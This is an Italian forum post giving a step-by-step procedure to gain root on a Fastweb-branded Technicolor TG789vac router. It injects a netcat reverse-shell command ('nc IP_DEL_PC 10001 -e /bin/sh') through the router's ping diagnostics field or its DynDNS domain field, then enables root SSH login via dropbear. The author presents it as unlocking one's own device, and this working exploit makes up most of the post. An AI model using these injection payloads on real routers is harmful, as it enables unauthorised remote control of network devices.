Se parliamo del modem in oggetto, Technicolor TG789vac Xtream_IAD (scolapasta bianco brandizzato Fastweb, fermo alla release 16.2), ce l'ho anch'io e l'ho sbloccato da tempo. Niente autoflashgui, basta seguire questa procedura:
1- Assicuratevi di non avere firewall attivi sul PC
2- Collegate il router al PC ed annotatevi l'IP che utilizza questo ultimo
3- Lanciare netcat in ascolto sul PC (esiste anche la versione windows, si scarica facilmente)
nc -lvvp 10001
"10001" è la porta TCP di ascolto, potete usare una porta alta ( 1024-65535 ) qualunque. La 10001 è quella che si trova in tanti esempi
4- Aprite la pagina di diagnostica -> Ping & Traceroute -> nella sezione "indirizzi IP" inserite:
:::::::;nc IP_DEL_PC 10001 -e /bin/sh
e lanciate il test del ping. Sul PC dovrebbe comparire la scritta "connected to IP_DEL_ROUTER"
5- adesso sul PC lanciate i comandi per attivare l'utenza root ed il servizio SSH dropbear:
passwd root
<inventatevi una password di root - va inserita e poi confermata>
uci set dropbear.@dropbear[0].PasswordAuth='on'
uci set dropbear.@dropbear[0].Interface='lan'
uci set dropbear.@dropbear[0].RootPasswordAuth='on'
uci set dropbear.@dropbear[0].RootLogin='1'
uci set dropbear.@dropbear[0].enable='1'
uci commit
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
/etc/init.d/dropbear restart
FINE!
Se il punto 4 non funziona provate con il servizio DynDNS:
4b- Aprite pagina “Servizi WAN”, andate nella nella sezione DDNS e inserite questa stringa nel campo “Dominio”:
www.ooo.com; nc IP_DEL_PC 10001 -e /bin/sh &
Attivate il servizio DynDNS e infine salvate
Se non ricordo male, a me ha funzionato il punto 4b.
Dopodiché potete installare la GUI di Ansuel oppure, se siete utenti esperti, potete operare direttamente sui file di configurazione da console ssh (come faccio io!).
P.S. Il suddetto modem non va restituito a seguito di disdetta/migrazione (quelli vecchi non li rivogliono più).